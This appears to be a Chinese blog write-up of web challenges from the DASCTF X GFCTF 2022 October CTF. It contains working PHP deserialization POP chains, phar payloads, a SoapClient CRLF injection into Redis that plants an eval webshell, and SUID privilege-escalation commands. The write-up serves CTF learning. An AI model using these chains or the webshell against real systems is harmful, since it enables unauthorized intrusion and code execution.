DASCTF X GFCTF 2022十月挑战赛

已于 2022-10-30 20:27:10 修改
阅读量1.1k 收藏 1
点赞数 1
分类专栏: BUUCTF 文章标签: 比赛复现
于 2022-10-29 20:47:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/127550670
版权

EasyPOP

源码:

<?php
highlight_file(__FILE__);
error_reporting(0);

class fine
{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __invoke()
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        $this->cmd = "";
        die("Go listen to Jay Chou's secret-code! Really nice");
    }
}

class show
{
    public $ctf;
    public $time = "Two and a half years";

    public function __construct($ctf)
    {
        $this->ctf = $ctf;
    }


    public function __toString()
    {
        return $this->ctf->show();
    }

    public function show(): string
    {
        return $this->ctf . ": Duration of practice: " . $this->time;
    }


}

class sorry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    public $key;

    public function __construct($name, $password)
    {
        $this->name = $name;
        $this->password = $password;
    }

    public function __sleep()
    {
        $this->hint = new secret_code();
    }

    public function __get($name)
    {
        $name = $this->key;
        $name();
    }


    public function __destruct()
    {
        if ($this->password == $this->name) {

            echo $this->hint;
        } else if ($this->name = "jay") {
            secret_code::secret();
        } else {
            echo "This is our code";
        }
    }


    public function getPassword()
    {
        return $this->password;
    }

    public function setPassword($password): void
    {
        $this->password = $password;
    }


}

class secret_code
{
    protected $code;

    public static function secret()
    {
        include_once "hint.php";
        hint();
    }

    public function __call($name, $arguments)
    {
        $num = $name;
        $this->$num();
    }

    private function show()
    {
        return $this->code->secret;
    }
}


if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
    $a->setPassword(md5(mt_rand()));
} else {
    $a = new show("Ctfer");
    echo $a->show();
}
?>

poc:

<?php
class fine
{
    public $cmd;
    public $content;
}
class secret_code
{
    public $code;
}

class show
{
    public $ctf;
    public $time;
}


class sorry
{
    public $name;
    public $password;
    public $hint;
    public $key;
}

$sorry = new sorry();
$sorry2 = new sorry();
$show = new show();
$secret_code = new secret_code();
$fine = new fine();
$sorry->hint = $show;
$show->ctf = $secret_code;
$secret_code->code = $sorry2;
$sorry2->key = $fine;
$fine->cmd = 'system';
$fine->content = 'cat /flag';
echo serialize($sorry);
?>

payload:只需要绕过 fine 类的 __wakeup 就可以了。

?pop=O:5:"sorry":4:{s:4:"name";N;s:8:"password";N;s:4:"hint";O:4:"show":2:{s:3:"ctf";O:11:"secret_code":1:{s:4:"code";O:5:"sorry":4:{s:4:"name";N;s:8:"password";N;s:4:"hint";N;s:3:"key";O:4:"fine":3:{s:3:"cmd";s:6:"system";s:7:"content";s:9:"cat /flag";}}}s:4:"time";N;}s:3:"key";N;}

hade_waibo

源码获取:search 界面,filename 参数获取源码,这些大家都会,怎么获取 flag 才是难点。
在这里插入图片描述

在这里插入图片描述
主要就是 class.php:

<?php
class User
{
    public $username;
    public function __construct($username){
        $this->username = $username;
        $_SESSION['isLogin'] = True;
        $_SESSION['username'] = $username;
    }
    public function __wakeup(){
        $cklen = strlen($_SESSION["username"]);
        if ($cklen != 0 and $cklen <= 6) {
            $this->username = $_SESSION["username"];
        }
    }
    public function __destruct(){
        if ($this->username == '') {
            session_destroy();
        }
    }
}

class File
{
    #更新黑名单为白名单,更加的安全
    public $white = array("jpg","png");

    public function show($filename){
        echo '<div class="ui action input"><input type="text" id="filename" placeholder="Search..."><button class="ui button" οnclick="window.location.href=\'file.php?m=show&filename=\'+document.getElementById(\'filename\').value">Search</button></div><p>';
        if(empty($filename)){die();}
        return '<img src="data:image/png;base64,'.base64_encode(file_get_contents($filename)).'" />';
    }
    public function upload($type){
        $filename = "dasctf".md5(time().$_FILES["file"]["name"]).".$type";
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $filename);
        return "Upload success! Path: upload/" . $filename;
    }
    public function rmfile(){
        system('rm -rf /var/www/html/upload/*');
    }
    public function check($type){
        if (!in_array($type,$this->white)){
            return false;
        }
        return true;
    }

}

#更新了一个恶意又有趣的Test类
class Test
{
    public $value;

    public function __destruct(){
        chdir('./upload');
        $this->backdoor();
    }
    public function __wakeup(){
        $this->value = "Don't make dream.Wake up plz!";
    }
    public function __toString(){
        $file = substr($_GET['file'],0,3);
        file_put_contents($file, "Hack by $file !");
        return 'Unreachable! :)';
    }
    public function backdoor(){
        if(preg_match('/[A-Za-z0-9?$@]+/', $this->value)){
            $this->value = 'nono~';
        }
        system($this->value);
    }

}

非预期解

test 类中的 backdoor 函数可以执行 system,但有过滤,过滤了字母数字和三个符号,并且 system 无法执行异或、取反、或,且反序列化后会先执行 __wakeup 再执行 backdoor,这边的 __wakeup 无法绕过,因为 php 的版本不符合,那么怎么使 value 值不发生改变呢?这边就涉及到一个小的知识点:我们只需要让 value 指向一个变量的地址,这样它的值就无法改变了。

class Test
{
    public $value;

    public function __destruct(){
        chdir('./upload');
        $this->backdoor();
    }
    public function __wakeup(){
        $this->value = "Don't make dream.Wake up plz!";
    }
    public function __toString(){
        $file = substr($_GET['file'],0,3);
        file_put_contents($file, "Hack by $file !");
        return 'Unreachable! :)';
    }
    public function backdoor(){
        if(preg_match('/[A-Za-z0-9?$@]+/', $this->value)){
            $this->value = 'nono~';
        }
        system($this->value);
    }

}

在保证 value 不会被改变的情况下,怎么绕过 preg_match 执行 shell 呢?这边又有一个小知识点:在 linux 中,. ./* 会把当前目录下的所有文件当作 sh 文件执行。
在这里插入图片描述
且在这题中我们可以上传文件,那没我们可以上传一个 jpg 文件,内容为:

#/bin/sh
ls /

问题又来了,怎么令 value. ./* 呢?我们接着看 User 类,在 __wakeup$this->username = $_SESSION["username"];,也就是 $this->username == 我们的登录名,那么我们是就可以在登录时,以 . ./* 为登录名,然后令 Test 类中的 value 指向 username,因为 username 是可控的。

class User
{
    public $username;
    public function __construct($username){
        $this->username = $username;
        $_SESSION['isLogin'] = True;
        $_SESSION['username'] = $username;
    }
    public function __wakeup(){
        $cklen = strlen($_SESSION["username"]);
        if ($cklen != 0 and $cklen <= 6) {
            $this->username = $_SESSION["username"];
        }
    }
    public function __destruct(){
        if ($this->username == '') {
            session_destroy();
        }
    }
}

poc:

<?php
class User
{
public $username;
}

class Test
{
public $value;
}
$User = new User();
$Test = new Test();
$User->a = $Test;
$Test->value = &$User->username;
echo serialize($User);

$phar = new Phar("ddd.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($User); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

?>

在这里插入图片描述
最后读取flag,base64 解码 file.php?m=show&filename=/ghjsdk_F149_H3re_asdasfc

预期解

预期解就是利用 * /* ,把文件名当作命令,例如我们的文件名是 cat 那么就是 cat /*,但这个有个局限性,就 cat 而言,如果它不是排在第一位,就无法执行,反之可以。
在这里插入图片描述
回到题目,那么我们先要上传一个 cat 名字的文件,那要怎么传呢?在 test 类中的 __toString 可以传文件,且文件名是可控的。
在这里插入图片描述
且在 User 类中的 __destruct 存在 $this->username == '' 弱比较,可以令 usernametest 类 ,这样就可以触发 __toString 了。
在这里插入图片描述
那么 User 类中的 __wakeup 该怎么绕过呢?可以令 username 为一个数组,这样 username 就可以改为 test 类了。
在这里插入图片描述
在这里插入图片描述
第一条链子:

<?php

class User
{
public $username;
}

class Test
{
public $value;
}
$User = new User();
$Test = new Test();
$User->username = $Test;
echo serialize($User);

$phar = new Phar("ddd.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($User); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

 ?>

此时 cat 已经写进去。
在这里插入图片描述
那么第二步就和非预期解一样了,只不过这次的 username == * /*

<?php
class User
{
public $username;
}

class Test
{
public $value;
}
$User = new User();
$Test = new Test();
$User->a = $Test;
$Test->value = &$User->username;
echo serialize($User);

$phar = new Phar("ddd.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($User); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

?>

在这里插入图片描述

EasyLove

先读 hint.php

<?php
class hint{
    public $hint = 'php://filter/read=convert.base64-encode/resource=/var/www/html/';
}
echo serialize(new hint());

hint.php 源码:

<?php
$hint = "My favorite database is Redis and My favorite day is 20220311";
?>

有 redis 且有密码是 202203111,所以我们可以通过 CRLF 控制请求头,再结合 SoapClient 发起请求写入 shell。

想了解 redis 未经授权访问的移步:https://blog.csdn.net/shinygod/article/details/127034013 第 360 题。

SoapClient 原生类的使用这边就贴一下 Y4 师傅的解释。

综述:

php在安装php-soap拓展后,可以反序列化原生类SoapClient,来发送http post请求。

必须调用SoapClient不存在的方法,触发SoapClient的__call魔术方法。

通过CRLF来添加请求体:SoapClient可以指定请求的user-agent头,通过添加换行符的形式来加入其他请求内容
----------------------------------------
原文链接:https://blog.csdn.net/solitudi/article/details/113588692

poc:

<?php
class swpu{
    public $wllm;
    public $arsenetang;
    public $l61q4cheng;
    public $love;
    public function __construct(){
    
    	$this->wllm = 'SoapClient';
    	$this->l61q4cheng = array(
    		'user_agent'=>"\r\nAUTH 20220311\r\nCONFIG SET dir /var/www/html\r\nSET x '<?@eval(\$_POST[1]);?>'\r\nCONFIG SET dbfilename cmd.php\r\nSAVE",
    		'uri'=>'bbb', 
    		'location'=>'http://127.0.0.1:6379'
    	);

    }

}
echo urlencode(serialize(new swpu()));

这边反序列化后可以等一会就可以蚁剑连了,网页在转圈的原因是没有收到返回的信息自然就会在那边一直转。

flag 文件没有权限读取,这边学到了一个提权的小知识,suid 提权。
在这里插入图片描述
这边的 date 可执行文件中的 s 就是 suid 了。
在这里插入图片描述
提权payload:

find / -perm -u=s -type f 2>/dev/null
date -f /hereisflag/flllll111aaagg

如果还有什么方法,希望大叫能够告之 ^ _ ^ ,最后这题感觉主从复制应该也行。

BlogSystem

有点难,以后集合再弄吧

reference

dasctf 微信公众号里的 wp 文档
https://pysnow.cn/archives/566/
https://blog.csdn.net/qq_64201116/article/details/127541200?spm=1001.2101.3001.6650.8&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EOPENSEARCH%7Edefault-8-127541200-blog-127550670.pc_relevant_landingrelevant&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EOPENSEARCH%7Edefault-8-127541200-blog-127550670.pc_relevant_landingrelevant&utm_relevant_index=9
succ3
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
Ant & SVN task script
11-17
it's very article which introduece svn task work with ant script in your project.
DASCTF EZUnserialize
Firebasky的博客
10-06 521
思路 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); }//3->6 function read($data) { return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data); }//6->3 class A{ public $
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 855
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
2021 第四届 浙江省大学生网络与信息安全竞赛技能赛 决赛 Writeup,5题
小哈里的博客
09-08 3125
re:RE人三项,preprocess。用工具尝试进行base循环解密即可。
DASCTF X GFCTF 2022十月挑战赛 WriteUp
Whitebird的博客
10-24 3629
DASCTF X GFCTF 2022十月挑战赛 WriteUp
DASCTF X GFCTF 2022十月挑战赛--Crypto
Luiino的博客
11-05 487
最后一步没搞出来,勉强就会这一道了(看了wp的情况下)。就是把flag截取成前一部分和后一部分。解出n_1,发现可以分解,有三个因数,那。对m进行随机数取余,在进行rsa基础加密。n2:取flag第20位字节之后的部分。传的参数是m2,即flag的后一部分。,解得k2 = 0,即m2 = m。n1:将flag右移200比特。看起来逻辑一样,基础rsa加密。得到了flag的前一部分。于是在模n_3的域上构造。
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ (1).zip
12-07
DASCTF 吉林工师 欢迎来到魔法世界 ctf 真题
安恒_务实的网络安全.pdf
08-15
安恒_务实的网络安全 业务安全
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
DASCTF X GFCTF 2022十月挑战赛web
m0_62422842的博客
10-30 1771
此篇题解涉及到了pop链 的构造,phar上传以及rce,php原生类以及ssrf打内网redis,还有flask框架
DASCTF X GFCTF 2022十月挑战赛
trytowritecode的博客
10-25 1367
web方向部分wp
DASCTF X GFCTF 2022十月挑战赛-hade_waibo
qq_64201116的博客
10-26 862
这是一个非预期解,但是得到出题人的赞许,莫名开心,哈哈:cancan need处存在任意文件读取这种查文件+文件上传,多半就是考phar,但是这次没做出来主要卡在的过滤了本来的思路是上传一个文件1.jpg,内容如下:#!/bin/bashls /这个文件在/upload目录下面,只要命令是。
DASCTF X GFCTF 2022十月挑战赛-re
Todog的博客
10-24 675
安恒2022.10月赛-re题解
DASCTF X CBCTF 2022九月挑战赛
shinygod的博客
10-19 666
找给 check.php 发包的那个部分。可以在开发者工具里全局搜索一下,发现是 sn 这个函数发的包,代码有点乱可以。在 sn 函数中看到了三个参数的设置。先看一下是在哪边调用的 sn ,然后一个一个的跟踪就行了。搜索 checkCode ,checkCode 由一串字符串和 salt 构成,而 tm 是时间戳,score 是分数,最后就可以构造 exp了。
2022DASCTF MAY 出题人挑战赛
qq_61620566的博客
05-27 714
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、misc 1.不懂PCB的厨师不是好黑客 2.卡比 二、web 1. 2. 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、misc 1.不懂PCB的厨师不是好黑客 用记事本.
bugku-CTFlogin2(SKCTF)(hint:union,命令执行)
Abc_Kimball的博客
01-31 685
本题要点:union绕过、命令执行、脚本编写、base64编码 进入页面 使用弱口令破解,一顿弱口令没卵用 抓包查看不用抓包,直接发送到repeater并且go 看见tip有些乱码,拿走解码,base64解密 sql="SELECTusername,passwordFROMadminWHEREusername=′".sql="SELECT username,password FROM admin WHERE username='".sql="SELECTusername,passwordFROMadmin
DASCTF X GFCTF 2022十月 Misc
mumuzi的博客
10-24 3747
DASCTF X GFCTF 2022 10月
DASCTF 2022十月挑战赛 web
qq_61768489的博客
11-04 758
拿到源码就看哪里可以命令执行RCE,看那些php特殊函数,这里的话 就是`call_user_func($this->cmd, $this->content);首先destruct就直接调用了这两个方法,newnewnew()里面的参数我们是可控的属性,flag()里调用了不存在的方法。这里为何还需要User对象用一个不存在的属性实例化 Test()类,确实不太理解,有和没有的区别如下。admin被注册了,考虑如何登录admin,用普通用户登录一下,有发布文章,修改密码,查看文章的功能。
2022dasctf x su 三月春季挑战赛
最新发布
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值